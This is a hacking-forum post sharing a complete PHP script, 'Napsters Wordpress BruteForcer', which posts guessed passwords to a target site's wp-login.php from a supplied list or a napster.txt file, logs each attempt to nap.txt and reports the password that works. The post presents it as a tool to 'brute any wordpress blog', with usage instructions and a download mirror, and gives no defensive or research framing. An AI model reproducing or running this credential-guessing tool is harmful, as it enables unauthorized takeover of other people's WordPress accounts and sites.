Jump to content
Fi8sVrs

Napsters Wordpress BruteForcer

By Fi8sVrs, in Programe hacking

Recommended Posts

  • Active Members
Fi8sVrs Rookie

Fi8sVrs

Posted
  • Active Members
Posted

Name:Napsters Wordpress Brute Forcer

Coded in: PHP

Develop by: Dr-Freak

Using this you can brute any wordpress blog.

You can add your passwords list to brute in forum in the script or even just upload you big list in same directory and rename it to napster.txt.

It will also make a file nap.txt in which you have all passowrds combination you try so far,this is just to keep track which was last password attempt to check by the script.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>W0rdPress Brute Forcer [#] Napsters Cr3w</title>
<style type="text/css">
<!--
body {
	background-color: #000000;
}
.style2 {color: #FF0000}
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif}
.style4 {
	font-size: 67px;
	font-weight: bold;
	color: #FFFFFF;
	font-family: Arial, Helvetica, sans-serif;
}
.style7 {
	font-weight: bold;
	color: #FFFFFF;
	font-size: 67px;
	font-family: Verdana, Arial, Helvetica, sans-serif;
}
.style8 {
	font-size: 24;
	color: #FF0000;
}
.style67 {
	font-size: 24;
	color: #FFFFFF;
}
-->
</style></head>

<body>
<div align="center" class="style3">
  <h1 class="style7">WordPress Brute Forcer</h1>
  <p><span class="style4"><span class="style2">Napsters Cr3w & 0xf</span></span></p>
  <p><span class="style8">Develop By Dr-Freak</span></p>
</div>

</body>
<span class="style67"><center>Gr3tx T0 Virus Hima . Red Virus . MrCreepy . The Lions Heart . Max0xf . Seeker . Hex786 . Mkhan Swati . All 0xf members</center></span>
<p> </p>

</html>


<?php




/**
   * @author dr.freak
   *@copyright 2012
   */

function login ($url,$user,$pass){
       $login = $url.'/wp-login.php';
       $to = $url.'/wp-admin';
       $data = array('log'=>$user,'pwd'=>$pass,'rememberme'=>'forever','wp-submit'=>'Log In','redirect_to'=>$to,'testcookie'=>1);
	   $ch=curl_init();
	   curl_setopt($ch,CURLOPT_URL,$login);
	   curl_setopt($ch,CURLOPT_POST,true);
	   curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
	   curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
	   $resutl = curl_exec($ch);
		curl_close($ch);


		if(eregi ('<div id="login_error">',$resutl)) {
			return false;
		}else{
			return true;
			}
		}
	function GetIP() 
{ 
	if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
		$ip = getenv("HTTP_CLIENT_IP"); 
	else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
		$ip = getenv("HTTP_X_FORWARDED_FOR"); 
	else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
		$ip = getenv("REMOTE_ADDR"); 
	else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
		$ip = $_SERVER['REMOTE_ADDR']; 
	else 
		$ip = "unknown"; 
	return($ip); 
} 
$a=GetIP();

echo '<span class="style8"><center>Your IP  : ';
echo "$a<br></center></span>";
	if (!isset($_GET['star'])) {
				echo '<center><form method="post" action="?star">
				<span class="style8">Target </span> : <input name="target" type="text" value="http://www. "size="40"><brr />
				<span class="style2">Username </span> : <input name="username" type="text"><br />
				 <input type="checkbox" name="list" value="Yes" />
				<span class="style8">[#]Tick If Y0u Want To Brute Via txt Litst  </span> 
<span class="style8">Upload Txt List As napster.txt In Same Dir<br/> </span>
				<span class="style8">Passwords </span> : <br><textarea cols="50" rows="5" name="passwords"></textarea><br />

				<input type="submit" value="submit">
				</form></center>';
				}

		else{
		if(isset($_POST['list']) &&
   $_POST['list'] == 'Yes')
   {
   $fileName='napster.txt';
   if(file_exists($fileName)) {
        $file = fopen($fileName,'r');
        while(!feof($file)) { 
            $name = fgets($file);
			$passwords = $name;
$fileName1='nap.txt';

				   $file1 = fopen($fileName1,'a');

				   fwrite( $file1, "$passwords\n");
			$username = $_POST['username'];
			$target = $_POST['target'];
			if (login($target,$username,$passwords)) {
						echo '<span class="style8"><center>Target  : ';
echo " : $target <br /> Username : $username <br />Password  : $passwords<br/></span>";
						break;

						}


        }
        fclose($file);
    }




   }

		else {
				$passwords = $_POST['passwords'];
				$username = $_POST['username'];
				$target = $_POST['target'];

				$ex = explode("\n",$passwords);
				foreach($ex as $passwords) {
				$fileName1='nap.txt';

				   $file1 = fopen($fileName1,'a');

				   fwrite( $file1, "$passwords\n");

					if (login($target,$username,$passwords)) {

						echo '<span class="style8"><center>Target  : ';
echo " : $target <br /> Username : $username <br />Password  : $passwords<br/></span>";
						break;

						}
}
}
}
echo '<br><span class="style67"><center>C0ded @ Dr-Freak Labs</center></span>';

		?>

Download mirror:wordpress bruteforce.php

usage: target: http://example.com/blog/wp-login.php

sursa: r00tw0rm.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...